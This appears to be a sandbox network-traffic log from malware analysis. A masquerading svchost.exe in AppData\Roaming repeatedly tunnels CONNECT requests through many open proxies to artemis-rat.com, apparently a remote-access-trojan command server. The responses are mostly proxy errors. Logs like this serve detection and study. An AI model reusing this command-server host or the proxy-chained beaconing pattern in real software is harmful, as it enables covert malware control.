                                                                                    Mar 9, 2024 13:14:32.818913937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.208355904 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:33.208405018 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2992192.168.2.557237202.61.204.518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.831636906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646012068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2993192.168.2.559721104.20.125.1248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.832019091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.986347914 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2994192.168.2.55964046.35.9.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.836410999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2995192.168.2.558923103.146.137.5108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.841568947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2996192.168.2.55965551.15.247.931637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.858264923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2997192.168.2.55965423.137.248.197888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.860901117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2998192.168.2.55905445.188.164.48199443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.861478090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.062798977 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2999192.168.2.559635122.51.123.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.861479044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3000192.168.2.55899782.223.121.72498543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.865335941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.973870993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3001192.168.2.559659121.164.200.18108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.867228985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3002192.168.2.559498175.183.82.221819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.873043060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3003192.168.2.55963791.202.230.219808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.875904083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3004192.168.2.559177162.241.6.976336043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.880703926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.020174980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3005192.168.2.5596448.219.179.2371567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.883260012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3006192.168.2.558745199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.887248039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3007192.168.2.55971723.137.248.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.888612986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3008192.168.2.559552123.241.210.1238043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.894399881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3009192.168.2.559681185.110.190.998043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.898149967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3010192.168.2.559804199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.904536009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3011192.168.2.559450117.160.250.163999043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.905230999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.591082096 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3012192.168.2.559792110.12.211.1408043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.978420973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3013192.168.2.55979145.138.87.238108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.990303040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3014192.168.2.55918943.131.248.1651567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.007445097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3015192.168.2.55976081.169.187.1948043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.066173077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.384543896 CET474INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache
                                                                                    Allow: GET,POST,OPTIONS,HEAD
                                                                                    Content-Length: 290
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3016192.168.2.55729645.117.179.1791782743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.074310064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846127033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3017192.168.2.55910651.75.125.2082702943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.077893019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.833451986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.834131002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833703995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3018192.168.2.559677193.136.97.178043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.078084946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.621074915 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 614
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
